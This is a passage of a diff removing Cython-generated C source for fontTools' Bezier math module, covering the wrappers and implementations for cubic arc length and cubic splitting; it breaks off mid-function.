__Pyx_GOTREF(__pyx_t_3); - __pyx_t_7 = __Pyx_PyObject_Call(((PyObject *)(&PyComplex_Type)), __pyx_t_3, NULL); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 71, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = NULL; - __pyx_t_8 = 0; - #if CYTHON_UNPACK_METHODS - if 
(unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_8 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[6] = {__pyx_t_3, __pyx_t_4, __pyx_t_5, __pyx_t_6, __pyx_t_7, __pyx_v_tolerance}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_8, 5+__pyx_t_8); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 70, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":56 - * - * - * def calcCubicArcLength(pt1, pt2, pt3, pt4, tolerance=0.005): # <<<<<<<<<<<<<< - * """Calculates the arc length for a cubic Bezier segment. 
- * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_XDECREF(__pyx_t_7); - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcCubicArcLength", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":75 - * - * - * def _split_cubic_into_two(p0, p1, p2, p3): # <<<<<<<<<<<<<< - * mid = (p0 + 3 * (p1 + p2) + p3) * 0.125 - * deriv3 = (p3 + p2 - p1 - p0) * 0.125 - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_3_split_cubic_into_two(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_2_split_cubic_into_two, "_split_cubic_into_two(p0, p1, p2, p3)"); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_3_split_cubic_into_two = {"_split_cubic_into_two", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_3_split_cubic_into_two, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_2_split_cubic_into_two}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_3_split_cubic_into_two(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_p0 = 0; - PyObject *__pyx_v_p1 = 0; - PyObject *__pyx_v_p2 = 0; - PyObject *__pyx_v_p3 = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[4] = {0,0,0,0}; - int 
__pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("_split_cubic_into_two (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_p0,&__pyx_n_s_p1,&__pyx_n_s_p2,&__pyx_n_s_p3,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_p0)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 75, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_p1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 75, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_split_cubic_into_two", 1, 4, 4, 1); __PYX_ERR(0, 75, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_p2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if 
(unlikely(PyErr_Occurred())) __PYX_ERR(0, 75, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_split_cubic_into_two", 1, 4, 4, 2); __PYX_ERR(0, 75, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_p3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 75, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_split_cubic_into_two", 1, 4, 4, 3); __PYX_ERR(0, 75, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "_split_cubic_into_two") < 0)) __PYX_ERR(0, 75, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 4)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - } - __pyx_v_p0 = values[0]; - __pyx_v_p1 = values[1]; - __pyx_v_p2 = values[2]; - __pyx_v_p3 = values[3]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("_split_cubic_into_two", 1, 4, 4, __pyx_nargs); __PYX_ERR(0, 75, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools._split_cubic_into_two", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_2_split_cubic_into_two(__pyx_self, __pyx_v_p0, __pyx_v_p1, __pyx_v_p2, __pyx_v_p3); - - /* function 
exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_2_split_cubic_into_two(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_p0, PyObject *__pyx_v_p1, PyObject *__pyx_v_p2, PyObject *__pyx_v_p3) { - PyObject *__pyx_v_mid = NULL; - PyObject *__pyx_v_deriv3 = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("_split_cubic_into_two", 1); - - /* "fontTools/misc/bezierTools.py":76 - * - * def _split_cubic_into_two(p0, p1, p2, p3): - * mid = (p0 + 3 * (p1 + p2) + p3) * 0.125 # <<<<<<<<<<<<<< - * deriv3 = (p3 + p2 - p1 - p0) * 0.125 - * return ( - */ - __pyx_t_1 = PyNumber_Add(__pyx_v_p1, __pyx_v_p2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 76, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __Pyx_PyInt_MultiplyCObj(__pyx_int_3, __pyx_t_1, 3, 0, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 76, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Add(__pyx_v_p0, __pyx_t_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 76, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Add(__pyx_t_1, __pyx_v_p3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 76, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Multiply(__pyx_t_2, __pyx_float_0_125); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 76, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_mid = __pyx_t_1; - __pyx_t_1 = 0; - - 
/* "fontTools/misc/bezierTools.py":77 - * def _split_cubic_into_two(p0, p1, p2, p3): - * mid = (p0 + 3 * (p1 + p2) + p3) * 0.125 - * deriv3 = (p3 + p2 - p1 - p0) * 0.125 # <<<<<<<<<<<<<< - * return ( - * (p0, (p0 + p1) * 0.5, mid - deriv3, mid), - */ - __pyx_t_1 = PyNumber_Add(__pyx_v_p3, __pyx_v_p2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 77, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyNumber_Subtract(__pyx_t_1, __pyx_v_p1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 77, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Subtract(__pyx_t_2, __pyx_v_p0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 77, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Multiply(__pyx_t_1, __pyx_float_0_125); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 77, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_v_deriv3 = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":78 - * mid = (p0 + 3 * (p1 + p2) + p3) * 0.125 - * deriv3 = (p3 + p2 - p1 - p0) * 0.125 - * return ( # <<<<<<<<<<<<<< - * (p0, (p0 + p1) * 0.5, mid - deriv3, mid), - * (mid, mid + deriv3, (p2 + p3) * 0.5, p3), - */ - __Pyx_XDECREF(__pyx_r); - - /* "fontTools/misc/bezierTools.py":79 - * deriv3 = (p3 + p2 - p1 - p0) * 0.125 - * return ( - * (p0, (p0 + p1) * 0.5, mid - deriv3, mid), # <<<<<<<<<<<<<< - * (mid, mid + deriv3, (p2 + p3) * 0.5, p3), - * ) - */ - __pyx_t_2 = PyNumber_Add(__pyx_v_p0, __pyx_v_p1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 79, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PyNumber_Multiply(__pyx_t_2, __pyx_float_0_5); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 79, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Subtract(__pyx_v_mid, __pyx_v_deriv3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 79, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyTuple_New(4); if 
(unlikely(!__pyx_t_3)) __PYX_ERR(0, 79, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_INCREF(__pyx_v_p0); - __Pyx_GIVEREF(__pyx_v_p0); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_v_p0)) __PYX_ERR(0, 79, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_1)) __PYX_ERR(0, 79, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 2, __pyx_t_2)) __PYX_ERR(0, 79, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_mid); - __Pyx_GIVEREF(__pyx_v_mid); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 3, __pyx_v_mid)) __PYX_ERR(0, 79, __pyx_L1_error); - __pyx_t_1 = 0; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":80 - * return ( - * (p0, (p0 + p1) * 0.5, mid - deriv3, mid), - * (mid, mid + deriv3, (p2 + p3) * 0.5, p3), # <<<<<<<<<<<<<< - * ) - * - */ - __pyx_t_2 = PyNumber_Add(__pyx_v_mid, __pyx_v_deriv3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 80, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PyNumber_Add(__pyx_v_p2, __pyx_v_p3); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 80, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_4 = PyNumber_Multiply(__pyx_t_1, __pyx_float_0_5); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 80, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyTuple_New(4); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 80, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__pyx_v_mid); - __Pyx_GIVEREF(__pyx_v_mid); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_mid)) __PYX_ERR(0, 80, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_t_2)) __PYX_ERR(0, 80, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_4); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 2, __pyx_t_4)) __PYX_ERR(0, 80, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_p3); - __Pyx_GIVEREF(__pyx_v_p3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 3, __pyx_v_p3)) __PYX_ERR(0, 80, __pyx_L1_error); - __pyx_t_2 = 0; - __pyx_t_4 = 0; - - /* 
"fontTools/misc/bezierTools.py":79 - * deriv3 = (p3 + p2 - p1 - p0) * 0.125 - * return ( - * (p0, (p0 + p1) * 0.5, mid - deriv3, mid), # <<<<<<<<<<<<<< - * (mid, mid + deriv3, (p2 + p3) * 0.5, p3), - * ) - */ - __pyx_t_4 = PyTuple_New(2); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 79, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_4, 0, __pyx_t_3)) __PYX_ERR(0, 79, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_4, 1, __pyx_t_1)) __PYX_ERR(0, 79, __pyx_L1_error); - __pyx_t_3 = 0; - __pyx_t_1 = 0; - __pyx_r = __pyx_t_4; - __pyx_t_4 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":75 - * - * - * def _split_cubic_into_two(p0, p1, p2, p3): # <<<<<<<<<<<<<< - * mid = (p0 + 3 * (p1 + p2) + p3) * 0.125 - * deriv3 = (p3 + p2 - p1 - p0) * 0.125 - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_AddTraceback("fontTools.misc.bezierTools._split_cubic_into_two", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_mid); - __Pyx_XDECREF(__pyx_v_deriv3); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":84 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * p0=cython.complex, - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_5_calcCubicArcLengthCRecurse(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_4_calcCubicArcLengthCRecurse, "_calcCubicArcLengthCRecurse(double mult, double complex p0, double complex p1, double complex p2, double complex p3)"); -static PyMethodDef 
__pyx_mdef_9fontTools_4misc_11bezierTools_5_calcCubicArcLengthCRecurse = {"_calcCubicArcLengthCRecurse", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_5_calcCubicArcLengthCRecurse, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_4_calcCubicArcLengthCRecurse}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_5_calcCubicArcLengthCRecurse(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - double __pyx_v_mult; - __pyx_t_double_complex __pyx_v_p0; - __pyx_t_double_complex __pyx_v_p1; - __pyx_t_double_complex __pyx_v_p2; - __pyx_t_double_complex __pyx_v_p3; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[5] = {0,0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("_calcCubicArcLengthCRecurse (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_mult,&__pyx_n_s_p0,&__pyx_n_s_p1,&__pyx_n_s_p2,&__pyx_n_s_p3,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 5: values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); - CYTHON_FALLTHROUGH; - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = 
__Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_mult)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 84, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_p0)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 84, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_calcCubicArcLengthCRecurse", 1, 5, 5, 1); __PYX_ERR(0, 84, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_p1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 84, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_calcCubicArcLengthCRecurse", 1, 5, 5, 2); __PYX_ERR(0, 84, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_p2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 84, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_calcCubicArcLengthCRecurse", 1, 5, 5, 3); __PYX_ERR(0, 84, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 4: - if (likely((values[4] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_p3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[4]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 84, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_calcCubicArcLengthCRecurse", 1, 5, 
5, 4); __PYX_ERR(0, 84, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "_calcCubicArcLengthCRecurse") < 0)) __PYX_ERR(0, 84, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 5)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); - } - __pyx_v_mult = __pyx_PyFloat_AsDouble(values[0]); if (unlikely((__pyx_v_mult == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 92, __pyx_L3_error) - __pyx_v_p0 = __Pyx_PyComplex_As___pyx_t_double_complex(values[1]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 92, __pyx_L3_error) - __pyx_v_p1 = __Pyx_PyComplex_As___pyx_t_double_complex(values[2]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 92, __pyx_L3_error) - __pyx_v_p2 = __Pyx_PyComplex_As___pyx_t_double_complex(values[3]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 92, __pyx_L3_error) - __pyx_v_p3 = __Pyx_PyComplex_As___pyx_t_double_complex(values[4]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 92, __pyx_L3_error) - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("_calcCubicArcLengthCRecurse", 1, 5, 5, __pyx_nargs); __PYX_ERR(0, 84, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools._calcCubicArcLengthCRecurse", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = 
__pyx_pf_9fontTools_4misc_11bezierTools_4_calcCubicArcLengthCRecurse(__pyx_self, __pyx_v_mult, __pyx_v_p0, __pyx_v_p1, __pyx_v_p2, __pyx_v_p3); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_4_calcCubicArcLengthCRecurse(CYTHON_UNUSED PyObject *__pyx_self, double __pyx_v_mult, __pyx_t_double_complex __pyx_v_p0, __pyx_t_double_complex __pyx_v_p1, __pyx_t_double_complex __pyx_v_p2, __pyx_t_double_complex __pyx_v_p3) { - double __pyx_v_arch; - double __pyx_v_box; - PyObject *__pyx_v_one = NULL; - PyObject *__pyx_v_two = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - int __pyx_t_1; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - PyObject *__pyx_t_7 = NULL; - PyObject *__pyx_t_8 = NULL; - int __pyx_t_9; - PyObject *(*__pyx_t_10)(PyObject *); - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("_calcCubicArcLengthCRecurse", 1); - - /* "fontTools/misc/bezierTools.py":93 - * @cython.locals(mult=cython.double, arch=cython.double, box=cython.double) - * def _calcCubicArcLengthCRecurse(mult, p0, p1, p2, p3): - * arch = 